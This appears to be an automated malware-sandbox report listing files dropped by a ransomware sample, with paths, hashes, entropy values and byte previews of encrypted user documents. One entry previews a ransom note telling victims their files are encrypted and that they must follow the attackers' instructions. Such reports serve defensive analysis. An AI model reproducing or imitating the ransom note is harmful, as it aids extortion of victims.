D$Zg.2.a.a.#....a;...u..D4d\.W...8."6....r.....+.....pR...P.:...4O.he...C..".6.)N....D}..PL.].........w%.YA&x.x....Q2.......j...i\...N...>8....T$.@..4...8.S.U.4....z.`.&..].....9..eCO.^x..{z.KE....1..Y..N......@..e....BGJ..zCs......L/..
          C:\Users\user\Desktop\VAMYDFPUND.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.829322670866774
          Encrypted:false
          SSDEEP:24:zbBLTE1h7a54Fydup/mejKk0vMXHyHoWbCv1VIQ3f2aLXADn+zYL:zbBQe05eWUDHoWboIGftu+2
          MD5:69CD774757F79A29F46D8E8DD2454CA9
          SHA1:A6D6BF74BF86357A2ADADCB0B2271475B7DAFC5D
          SHA-256:C29AFA8392358410C1F7CEC48284E20899E525A43B8B231F82FFB550931F5BA1
          SHA-512:B4F45D33631CB4D21D1CF1A923A765BA17180DE01ABF794963A0BEA7516FC9598595CE665ECED098267341223E8CFF88A1EA2D51B4F87F8C8732FA5F680AED6C
          Malicious:false
          Preview: ..S.Qwr..`......b.....x.=.>&...........q>.J..+..t6q.V...2..m.........*.E.83..3.C.@....a.....F....9dY'(\..*.|.4.,..,\....{8.H..U.T....);...1....<zz..Y..4.A.O...h.b.1.5..Q.b..a...^]..:~w.....p.Ng!...r.3....=.....v..Lr....O.c.r....1...*..!,....N.*..J.....WN{q...jU..p.\.H.LT..uXM...9..>i...u.....Z9W..++`..9.U..F.A..F..`.\]...+.b.o..J.N."......%.A3.0....X....|~{?..+.....f...............+..9.l.a...s...8....1.J....:.....v..T<.vU....O.t...*.w..!......?>HL.n...Lna.H.x.v.UJ.[...G...>..B.ly..0.,...a.X..r..`.Y.....NO.......V.:...*w.....H....H......T...r..A.P.c.U....R......3.B\.k..3rGNGx..N.........i.X..'........CY.....,....2.^.M...{..7...7.O......(.t%B_.|..>.L...z....3.....cP.. x..+.~..(...{..t.Z..BO..h......V- ...+L..|V..;.......i..#.`...#..q.O;.z...H.S..9.....3}........."..?.g.k.D'.-.2.w......~.6..@O..$....~..U...|..>....Q.x...l-.m.J...}...j...|h.%.N.".....'.........5.Y".#dd....|....o.y...f.p..t.H#....88FV..4r.,~..(...2D..3.`......g.M.[....
          C:\Users\user\Desktop\VAMYDFPUND\GRXZDKKVDB.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.845561965928946
          Encrypted:false
          SSDEEP:24:xMyFMAjxvTMNEwXlj6VJArLjlk80NoNSqtscPPvXADn+zAEWg/w:KbAj5TMNXu80g/PPu+cuw
          MD5:70035DBE015930D3F4A09839B1389017
          SHA1:4F1AABB2AAB4FF8D195B1FD0419974F348298F3B
          SHA-256:B810D14304837B0A9C39CFCD24365B737F9DF45D7EA23EF0146E6FBEBF9EF308
          SHA-512:E76B223A165684015D17F406BDA92250D8169EE3798C06D100CA17A4CA4EF1B2598DCE3C95760EE96F88D3290B7C77081622DCD7AC60EF577090A1A78EFA05F3
          Malicious:false
          Preview: ...y..YM..*.#.@x..X.0......Tk.& .k .....J..P0^...HB2.....S.:2). +..%.(. .u....h.eq.\.R.=t.U.....Nk_./....K...X...O=L/K......k0#8a.;A.'...99.p.X..jp...W`.x."..}..3Z].{..'..0....[R.......v.?.PQw..n.u.;.............~7_i$.h.?O(..=a..cJC.z.g..0.TIWG.).~.S...K.j...p....U......6.....x.e#....._.N.9.........-.r.>.g.+7.....M+Q...tF.S]\...r0.H....!x*.aI.N.r....1...9.d,........[.3.D...T.!M.#..k..S.f~.M.......Y..Am2U..Oj..J2l..=)\.#..u..T.E.#....b.4.O.q.G.G#=!...[...m'...".<2.i..Fj.....$.%j....i L`.<.]%-<..m...MpZ...F...7.....D.)b#.W*..>....YT......-...fA......5....P.^S..Y..Q^"....vMGnqx=..... ..P...G..M....$...Z..e~.......]-.S>.k5.qO.S..*..A9S.>....%..Wy ~.@..[CQ[..L|....=..3.........2..(.....G.4...A').H.....w8,.8`o#Jir.4kL...,w.9........3.Px...mH..\.._..v...@..bh...r.....8..g.k...]..w......d.gn.fb.g.*.:............._X+T....~.\..W.6.u...Q.h...6!b.}w/.N.............4./....}..r.$..OC);.........,,..3.FIwky.;.......P..o S.zu.M..X.wS..F/...e.....
          C:\Users\user\Desktop\VAMYDFPUND\PWCCAWLGRE.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.8530730063494
          Encrypted:false
          SSDEEP:24:WtcLqoUHUHNHVsfkPQlq52FeeVUBeLGitXADn+zdp:WtcDUYBVMkIq2F3UB6bpu+5p
          MD5:9250C7C695E0ED75CE425C15075E1AF9
          SHA1:2ED96BD607AC5E2BEEE3EA5D896D40C3D002057C
          SHA-256:EF8420A78C5EC8CB39BD6337EBE8CD3DC9B4B1A4E9E29E851A9DFA40CAA0C631
          SHA-512:41B868556315269EB372704D3B647B011EBE1829F9262B678FA5BAC7D5A273FF960EF3DB453EC6CC1A55A644E72F1CF8C98A8FE23F6528F6E66AF9B939BA0422
          Malicious:false
          Preview: .....R..F./D2.fQ.\Cm....y.!.o...V.....k.....c.Tq..b}.>.....o....{.>c..tn.^...=..).3.RY...p..1P...w1...4.....XX.......K...R..o......(....J.....\&.1..sJk...&..l.Zkf....d$...Ds.|.7..![.C3yb.B.,.Lh.. oH...H.Y.OG._z.{.....Y.C<g.{..\-.......F..=k...,..#.T.....gZ.c.I@..AO..W.`z...bZ..%S.U1.....z.`.m.....~?!...Q..#wg(.....z..d.B..$..W..]. ..C...n.B..M._z......|...{.q)......v/.2/.}.8U[..b.....xP."....p.5x?.?.......I..6e.<s..P.....j..$.M(..."..... .+.....LV....6z.]..EitubKf.gZ[.*\...-v.U......<....h.I..q.[.....j..(...+....D.w.B.kG.w.6.....=....M.W...E..U;.U-V.A.....n......z.j..bD...l.....-.yvB..R.v!&LO4_L.......'..\.{..L .....dg.-`.....{.../..j..............E....<.....A..T@.</..%.(....#-.X*..{.&....:R...x.ey..#Y.-.S8.F..*KI2....0.CX..t.p..o!.V.[q......Q.....n...i...N{E..o...x..f.L.rU.+._`.(.#.R.:U\.x..9..00...2..a...<QIr9.6YXw.r....k$._..u2.-$5Sh8V..7~....t..O...,.7...nM9'6.........)......:.eu.%].o.M...{d.7..c...7(.>Ea.hR.A....w.2.Sw...b..C?s..,
          C:\Users\user\Desktop\VAMYDFPUND\SFPUSAFIOL.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.835300424053646
          Encrypted:false
          SSDEEP:24:1IwGlCn3fOejqgKQ5cMestmz5/zN3/mPdkKamI0OKaDIXADn+zDWnN:1IB63ljbKIxmz5/zN3ePOKO0Qwu+PgN
          MD5:5DECDD68EB392CEBC18782C8E18CE3F6
          SHA1:7F5462B5926172074BA8345A4437B9168C14A6CE
          SHA-256:C4B334ECAD0B9D81B66A8091ADED16223C53472997AD7F64EA18633A06BBE862
          SHA-512:D9E7845244D567533789104CC7C1C59FA9C90DE493A23283F67D35CEA80C8A51F81BE7F46FF585C4B127E6466113B93C52774308F19C926F83844F977BA867EC
          Malicious:false
          Preview: .h....9....B9e....T+.0....4..L.O(....inV@..]5...[..,.`Hr..[. .>.....w.#@v...)..DS%B.........:...ci.;.X..^.vjM..g...h...3..'..g...m...6S.^.o...5.^.A.+.e.H..VZ@...4.q.c.X6.l...M......2.C..A.)..N.n .2.-6WbX...o..Q..0.).....f.s.Z.W..7....a...k..I..5..Oo/...@].<..b....{U...dM.......uF?.."..\...Z...Y......;..%.>......2I.H...hx...|[.67`8....Y.....%kKzOr_..8h.r..G..r..+..EieB.^(..l...//.Q2&=..^._}.m.(]X....w...ko\...8a.|s.^v..Nj[.....k3.B....%..GE0.;X.a..{...%8..v..`..l...5....b.PTv..........]1.....}.2._&NX..w.f.S.7+.o.[..2%."W..6g0.M...%.F.-.......R.D.p.Z#<..U..=...p.,.."1Yd.3..$.@.f..<.~.Rt.....`.x.}V..B..-}.q..>.MY....a....K.r6Y..J#%_.{..^...-..pTV...hv.. ...J...tM9!T;Y....5\..:....e........q..74|...^Nqf.L-j.2..K....Ub....p...........n....T........9.7;6,.es......O'.S..>Ruf....a........BO....:.:B..g._Z..V).p...#=..l.......h.s.z..2.-.,j...Q!@..D-J.H_.z..%J..t...[_.j..2.....6N.o.,Y........2B}GI=....t.......@Z%5t....}N...V...u...DlK.2|.'l.5.a.
          C:\Users\user\Desktop\VAMYDFPUND\SQSJKEBWDT.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.855168607015851
          Encrypted:false
          SSDEEP:24:EZgLNKI83N7m+VkLW2yUwXEA4rRFwq1sKbLs1jF/BXADn+zFN:fKIIrVkLah0hRFrLs1jJFu+n
          MD5:6A7926C0E31ACA4AC9D318B4BB4BB234
          SHA1:BEDB0798CFE1D6B73183D9E2277BC3B29F4E5D8B
          SHA-256:E317F025CAD79585ACD88AC62AF0CAD9FF40BE9BD7B0F91B9555DFF4EFD6A32E
          SHA-512:5B9C0BDCD79862AE2273E016640F7C706B0C065DDE3315001EA1DA32B7BF216ED187D9758C83292DFFE33AAF3962C631B770D1EAB292BBC99B314CBA11239537
          Malicious:false
          Preview: .e.t~...}.[`U.W.a2@cHJ....+.T...S...Y^U....H.l..=..\.....w.f.wun.o...iN...5.o..&..F.?w|7x}...!...g-..%..[O"..O=..E.G.0.... ..{N.6.....;o3h..JY!q..J .T...t............]J.....Pu..V...........+.So....9'pL..W[.....4m.-^........i...v...e.|..W..2...C+`......?m...BE...0.4'..k.L..wT....1.....K..nX...U3;..a.).}2..2....{..pq.9*..y..m..}V}i..?0s.DS.\;.g.A.=&.}.....,...c....|.....o.X..&...4.8.J....q....F..lM.\v..2T.l.1......[4t......BR.G..vIwX.j....:..........ZM.]...>...X>..YX..5.}...2..i.....2.......i.^.)..!..".."HR.YP....E....R*(.....SX!.6y..0...Vd.J...$..TG1.......-...3....y..F'X.......H,.;z.....X.......4a...8.xC....4....qoX....o.b.(.`4.O..,..k.w>.......^...S...u._.;....\3.(U...'.K..b..0/..T..].6.Z.l.....h......$P.c.x..>....u.....W..g..M....GYG.F.c..Y.>r..o....o...T.|Ts.:I..h.2.....&..s.L.ZG.....@)..$`.7P.t.%..r..n!nR..P.......$%.rn{.4.d..Z.....K7}<......>{.b..Y...u.....l.f..Y.W4.Pk$B...l.F)k.kQ.-..\...._.....<...".._.>..D.......f..Qegt.....
          C:\Users\user\Desktop\VAMYDFPUND\VAMYDFPUND.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.836184922072691
          Encrypted:false
          SSDEEP:24:Q5Vpk06syn4vxkhjP9vmqAW/Z48mKCX9u2BksULUiXADn+zYOzr:QCUvxE1vOO4821BkskU+u+ca
          MD5:A8F9240E136004AB585E7D9A44409B76
          SHA1:212B0A68ED33E8292B7F8BE9BEC01F74005B45CA
          SHA-256:5EFA51FE811DE0EE04344515DF70A5A99BC5C5BAAE60DB141959FF7A9055F0C5
          SHA-512:328DF4917AAC604E9CF241DF99869FEBCF052A889DC90430C59012F8B140B2A7454E7569BBBD93F092DAD591FBF6C7086B00E6B1E96A8CF0B3AB4E940A229B2E
          Malicious:false
          Preview: .....a..s.Fn.*d{K.MG.s...u...306..Pz......<...w{.._..\..+6J......t.7,.B.=...k...v.p.....`y.iz.`Q^..T..Q.Z...\^..../......5p5.......M....Z..R..y.}...;.K<...r..k(....`...!F.0So......:.wh.yryw.X....CZ.W.......#..l.._|.....Y.c.w.i..1.s"..5.....xb.O.....~..}...X.s,.G~.B..$...x..G.2.ug5.a..O..S..n.a.g..p......g|.}....AW.u.....C/....k.B.;(`.k..T..0....F.i..i;.?.w....|P.M.<. .^..a.Z.R.r.P..p.....>.[.....X.`.)P..<O...*.>...sL.Ug.$&....\.c..=%5.<.G..k{......$..u..DI..^.J'h.0....O[......|...MzN...Cr...+..J..nxq..s.;Md....o,.,q....t..]h.d...4.....;..W.r..@Gp?..h..z.3...4.=..c1..=..[.'.R .0...d.~.0....w....H..M...C.?B,.HS.*.^.......Q.s......>.!.....q_..- 9....~aVu.hgek.?.K........{.....|..?..R.+b.6...s^_....E.,....g.M...)2-..5.E.........8-k....81.;x....-....2-+.E....z.0....7.CA.>.C%....BX..O.V[Qf.'0@@8|..a.-..3...rB.h5/ThS....|x..Wg.eU..Z.G.:..2.kC..>..k..+.....4*%.Z\b...\._5.8...Uie|..Y...j.G..'..IV.L...O.C|K C}.4..4.Y.....p..q.t..M.u..C.e....[...G. ..iK.
          C:\Users\user\Desktop\VAMYDFPUND\ZQIXMVQGAH.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.8554823606673265
          Encrypted:false
          SSDEEP:24:GmnpS+3D80A4l+MGQIgpr+tjkHImTS/LgNlcylgTXADn+z7nGpn:7nprXlBGPsr+ZkU0Ndlg7u+HGpn
          MD5:BE808413B22E01E30C03FE9D5B49695E
          SHA1:2816F75304B0EA2F8BB33A8F4C8A7EF4FE542768
          SHA-256:63F010D5A6EB9CE5458B0263A566991D9EB03B0546B577DD511500FB5DE0273E
          SHA-512:D0B696C0E2C6B662824B1DA65D21B05D18CA5B3C12269924DD64E149C59D96F401828149DCF657CAABCDB9BFFEAC321DC0B3D51C8A8DC65761693A2E441CD8CE
          Malicious:false
          Preview: ....h)...UoWJ...Jv ..Y...)...l..+...<.~.N.Jm'h.b..6........2.....F.#.:.....5..b..~-.%S..+u0.....S.H9E....j..sf.w..o(...{...x.r.cvr..3..C...~ewi.......S@..../w..\'.wv...Ug.l..U:^.j.xmyw}^@/.L..N...../..../.]'c.c..3^.4KY..N!.....A.s....+.R.........s.....Hc$.nA/...0.I..T;l-...&.....P..tF.H.>.^...u\.1Vgn....cH.XE".Q.u..A2..N...3..8...2.....voH.>..%....TvKCe.;ts...g1Y..%.f:..k..Z..&....0.<].1a...U#<..D(.f.T..(.9.d;l.E..n..8d)Z...M.<....m.......bc.m.......I..._.J,.Ej...%,...1...*....N.Z2...|.i.,..J%YY..B...].R..,....\......I....$f.).......o..r.........G.?..Q4.ZQ.:U..<i....)....ji'..-....\.[.B...'p........_...Z...4..%..T..7..].r.......jVn.6y..i...u........>w..%...%.....=l(;....j. ..............9{..wP.pw..I.zE&p....!?...B:J.%..?...o.80.......m..y.e..tc1^F...N=R./.Y[z.d!..FV.1...)S=...;g...7D..4..A..y{.........s.#n......W...'3`@~)C............]:..%.......`Z_.a...zuU`..|..Q<.q..6.....n"......\_..\..r6.8....ck$.gr.@..tK..Y..7..^.....g...@....h^.....+.\i:..
          C:\Users\user\Desktop\VAMYDFPUND\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\WKXEWIOTXI.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.828783409135878
          Encrypted:false
          SSDEEP:24:WM1W6iicwKMk44iQEPdBQnSsyqs2t0GryzriyLXADn+zjr4kqb:1W0f4jpSs5JrSeGu+f1Y
          MD5:54E387E1D99C7E3360702A85742CF36A
          SHA1:87C27D5D10E6506A9DB0B29010A63787ACCC66FE
          SHA-256:60E733EEEA0C650550B32E62C3736725835950E7D5611A08713E6702D5F14321
          SHA-512:B1CBBB54E9C61E2782AD6372F971EC842EF216458E94B29DCF58E799F0B05C4B6433961BB1C062E77D9FA9941A053463BDC5F2A0648F8B44A464F24D6E7F4212
          Malicious:false
          Preview: .z.b........zQ.4.$#....D.F.X)'ex..m...(.....A...5Ey..H..<oiaA.s.b7.0|.<b.....u[...!.x...*2...\~...."dE.?....#..........L..\%}p._M.4>$.U..:.Lj.....qg...4KS?..8....x.m....q8L. .,..D...+..td/........jC....i..........m<..q......yh..T[?..7-.{WRC.;.L.)H)Q.'y.7........@r.`m....<..N.f..4.{...$....nL3>...~..wy..J`.....}s...A.c.!..+E...w.g..~h.y.DI5.$........*......=.xy>.....0....6..@..)b.h.Z3.b.....@`..J..v.*..2,.K.$...2.4kv.......v..G.O...u.....o.r....6.k8..?}........Q...)>..j.Hm.'q.V...yL.. 0..a.`.BK~....0.....H7s.%...0b#..!.!..f..7..ck..)....._..,0.....A;.....6.OF.7.[....pt"....F0..<Qe.,..|._.o.p<./.~..S.i.UjW...W......h)...E........a`U.......cob..,.MR_....@...$.K..q..:..q.y..Xm.7..[.......S...7~mfN...b.z....>..z~.....MC`q..u.(|}.Y".....6`.A(S..JJ....V.v..I...^.........x.....X.,./j......l.....T..,2..............3:UsE._4Qw.S.h......-..}Oo.....L.|s.7b.:.$....=lCn3....M.s.E..1..1.!.....k2.-Gy..u\,.|a>!.Pc...... ...^..h....).....H...d_...N.
          C:\Users\user\Desktop\WKXEWIOTXI.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.828336922622897
          Encrypted:false
          SSDEEP:24:Yt8rcgE3D1mT+uoMQS9SZByJie4ZiMkNhT4pqxk3hYWTI5AHQFYiviswORXADn+X:TrARuoQ9SZZe4ZiMkNtOhnVH/IFwO1ua
          MD5:E53362AB7EEBCF8FBC23E46E26CA76DD
          SHA1:A845913A24FFD23561D0B565C430DB1E7DC8C2DF
          SHA-256:EEBF082A66EAC8FE27F9C4849E563152BA957691F7DC7E38DF87F5CA078596AB
          SHA-512:ABBDF1B850FEC62D44A5000C896EFB0CB6DCAAA92E8433ADAA691CCB3EBD59530D7868867227D18273EC4318BA2455DA46113828437879F69F0442359E7842D2
          Malicious:false
          Preview: .T....2.t.YI..]&.e{'...oJ.=.l.....d.LJa...*Sf.3o..5J..t.a...Z.U..q....%._...Ts.Z.T.....z...S..........].>...4.,..-.......}.&.a"as..H..t.U...1.k..N...+.....!..U.....s.#.H8./T.?...._.~...p..iN.QQ..8.)....=.[%....iWh>F...<.C..Z.o.iA&@E.....Px...gA'.c....{.L.8...5.@........F?..&..G{c..-./....wYO..9.....6.......x..i.*t.....Z.Iu.e.8....Wl...i...Dt....#..>.!..&&......>.Ej.....7[..A. .%-.h4.<.p.5.....`a....k..7b..^*g} .^.."..i.C=...B^..LH^......d....p|.b.....`.....p.dZ.ZH....K.y8..:.J..`&t....).4.e..~y..g..+..#..vy.0.hgalF......)b\e............_....*.Za..|...>d.L... ..J-k:Jx...'(.1.r...........-s..%~.>?@91.|...j..n..6......t1Y.[?v.... ..h.K....6qa....._g.|.......[...~.Si......O..]....ND.......1).G...p....C6..._t...5...N[2.......f"p...|I.8.3..l.....3.....wF.8...+.D.J...yn.~.<..-S3A...Dq.O+...e..:9.PZW.....t...J..;...gUT. ..hi./...B...^.+..u..3KA`....}.....bb...G!.P&a.AS....U.I#{b....".+p+X6.b.{...O]..-.|L.q....9.1..6.{........\..W..6......]?.N..
          C:\Users\user\Desktop\WKXEWIOTXI\NEBFQQYWPS.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.835317660470376
          Encrypted:false
          SSDEEP:24:3/dagh/6FWn8V7FYF8FvCf+CdXv2Wy8BwadNbe5hJNS6xn0aQVcyHuXADn+zLb:Pdt8VxcMvCmeXv2Wy8BfdNbeHRHAcyHU
          MD5:C791ECF5EBD6A5C938F3B377C1EAAB68
          SHA1:7B4D4006F0E70E0437754EBE38FFD3A663EC2FF2
          SHA-256:9C5218721D4CF25E130F6FC9026EF07453BE9F0C5A51F202AB2D5B26B91D71E9
          SHA-512:47CF822E217FB93758780E58B8A328CB9AC6B418989D09AFC727BF6BBA907A0C9849B6A75F0CF87B3206D51D41B6968C70E9FADA469089CEE1371722CAF36A3A
          Malicious:false
          Preview: !...39.0L..(..Ty]...D......T?.?*.L..H.P..d][......a@."......u..K!u.=.W...61F.#!....R...A; =.l..D...7.....d.N*.Q........b9....Q...j..&.....S.0N....t..q}Y6,.0u..}.Nq..j.S1.0.$.j.v..%...Z.q..X.~.eQ.4n.E...h;...]{8..q].F.....Tk!.T..[.0k,.....cx..(.&...........}w..<.W......j.?ih>......Xs...(.d.A...|..k%.^H."@-x..a{^.d......c..A...QZ...a(.$.{|....JV.FA..p...V..W...[H.&....o.K..Ooi.z.;...(."L.>.@..t8c.hcX..9.&.....?.v.2.Y.5.:.|..oW...&t.A`y..x.f..u....*.I...=..!..h.-...St.\-;:..8.C..EC/qBI....1...yEU.].T..L=B........~.1........tW....d..j...ZV!Z.k."..-|...F.5.pNvkv..}.....S....6..[...&6Y..$..W`..\...6.K.#.....&...e...9.2.]..EH...Y..Y(.ZP.3.jk....-P..x.P.Wmv......Hw..LC....4.q........wU..`2.yS._P.E.+q.!.+.?1..KA.9sx......8v...,#.v.Q.;....i. .[...;o@.%...n.a...;.2.a...f.....;.....$....A."...b.W%.&......(..i....1\w...'../.n..o.!.7.K...E..A.T~ch|~@..3bk.7Fi....4.W...~.....O..1..erf..i.#.....E0.......%......Z._Cx....[..B.H.......).-8.\OQ...6..5.
          C:\Users\user\Desktop\WKXEWIOTXI\SFPUSAFIOL.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.831209809369885
          Encrypted:false
          SSDEEP:24:brvq4X17GqW5qreiymvBqen1y46sdC3n/RrL92psVXADn+zJO:HxUf5QaYqkdzmrx2pshu+k
          MD5:1EFA103B274CFF68E991BE20E000FEBF
          SHA1:9C25C85E5DACDBC7E776832818F27485DBF28805
          SHA-256:420E0E3FED61670F317DA16B380E62AC5EFAE4AE50A3685918CFD6E6DA5F557F
          SHA-512:7661B2C81ECE1D7C3E08D65BDB38253CC1886BF20E8BADEC927A62716CE5521F1A5619B34679027DE96A2BBF38005CACD325B4BB5F0804374C9C583800B3957D
          Malicious:false
          Preview: ..H.z...H...D..V...2..MIl...K}..O..6...s...Z...;z.x.1K4q......,.s#L'/VM&._..\.G@z..7....\..s.g....v...M.R..5r...X[...C......-....ua.I.#.4l$....n...vg.I...V._.-(&c....._..zp.r.~.e......'.........W.L.6.go....z..;.....D.q@.\6w:.._...6..w...v.R.1....1Q.V.2Q~R...l.@...m..n.g_.......".........n..6Xh.+....+>.s2.r....y.o .~....9....qb6.>.H...O...[..=.l.Gb.)&.....Q..;".{...Z..I...WBb.P..Fd...N?.[.m.-/=.V....j.e.}..V....k.....E.Y.....;....$R..BY'..c...l....^.@n|...M."......6[..V.CgD.......j..F...%\\...S..h.......G.Z.-b..8..\.b'....6.c...Iv.....g.\.O&:..O.".N)y..X]....}Be.Z..C....9m....."...........X.D....s2*7].#Vq..c.)N.kI.N.".{-.um$4..N....l....0.]l>..T...B.....\);.75a6.2.uMQ....'.o..0i......f..GN... ..|.jKZm.Ay..t....\....+d0..A..*..p....1..z#1)-?...tE..........&7^c....E..]....n.am.y..b.8.u.^..[m.D(..x.6....2.oF'D.r..h..u.RSf.5.{1j.En.R..:...wM......S...S..8.B{..G......*._..y%..&\..o.."o..+.%M.,.....E.:...4.........@.%.&..lF.o.%...iB]..zk........".....
          C:\Users\user\Desktop\WKXEWIOTXI\UOOJJOZIRH.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.851717017472232
          Encrypted:false
          SSDEEP:24:yUnFla79r3z5pd8jcaI01LCheS2s6LBnTUt+PyzXlyiumXr7XA1AdWsXADn+zbk2:y805Dh8jc2TS2vyZPTXf+8u+Xk2
          MD5:8A8514BF35B33371C92173139E321E3E
          SHA1:35CD53FD74BBEF82F0A524FD9122639C519BED86
          SHA-256:098709ED272D62D375156F8E54DDF7D34B1CA424F043D4884CFA6A7CD90C5BD3
          SHA-512:A1CBBD1BD87D28A5522F1D6FD9CDEF77AE9CD33E754D74D45614F2A9CD63D0AE460E5E1A533839A58377FCAB4A0B625A0F8A32C0059F59470B1B3382FC97C1A1
          Malicious:false
          Preview: .qV-..:).t...k..........X..q......e....Xv.....C._#..........M.P..gOH../;]tP...............T.....E....N....8...ITT.f.....H..F.R ..Y."*.u&uY.......7...Km@M@.{.k.. .}..R~..+.........X?.j"..88~.......A...../z%A.G...l.q.....t1.......I.Q........{... ....$,.3.^{$.K..mm.S....*F...1.6..]n..>j..fKUKT.........B.o*e.U.w&.p.7....t...Z.....i@......a.H.....e.|..4...3....Z...q.U.[...a.?.}KJ{.~.w.....Y:X..Y......].........4[.h.l}.."c'[kCxj....8].........x......r.7.}..zYAUP...._..\...Z...j...^..B.Mq.6C.w....S=l;......y.k:..C....M>. C.=.{.W.xlJ#...%..r. .Mt....J.1.........X.....z..|j..~.X;......O.-`4.....%*....p...v.!i..._..r.G...q~W._..08..]..V.H....C......)].:8..A#.L.L.h.i.|......$F....(MC24.7{.j`..8...q...6.....7....i.-.$.3.&.v...fA.GVn....[.O..H.%G2*?3...H.^...j....d.n.p...`wyZ..x....;..u..8n....9....h>b.t..it.....ONe..Z./.tb.$..h.<H!...t.:6..q...+L..D.7....-`".fc........h.0..Z".+..8)m.....\%l&.-....(.yG...<J.y.H[.L.....H.gn.....}..
          C:\Users\user\Desktop\WKXEWIOTXI\VAMYDFPUND.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.854449523299915
          Encrypted:false
          SSDEEP:24:DUUeRH206i0czoX63zFThcFW2dxbK91vGEYni+ToWXADn+zS:DURH206DcUm/cFW86bgoqu+G
          MD5:5CAE2C6EAA00A512B4451C1939818EE7
          SHA1:10178BBAA7259E96A08ECC328304C56C5FABF86F
          SHA-256:05CFF0B72FE698684BF9794623CE8C70AE8B0BFDC1B600792FDC64E93611B324
          SHA-512:3260EA1B4E1A26A87B2CEBBD779D80E72588E2E9A93EE7436BCCCB6EB2ACEF7831611CCDCE246D3B244DEE05D3A5E1679CF2254B11E9F2798DEA6467D7C2DB17
          Malicious:false
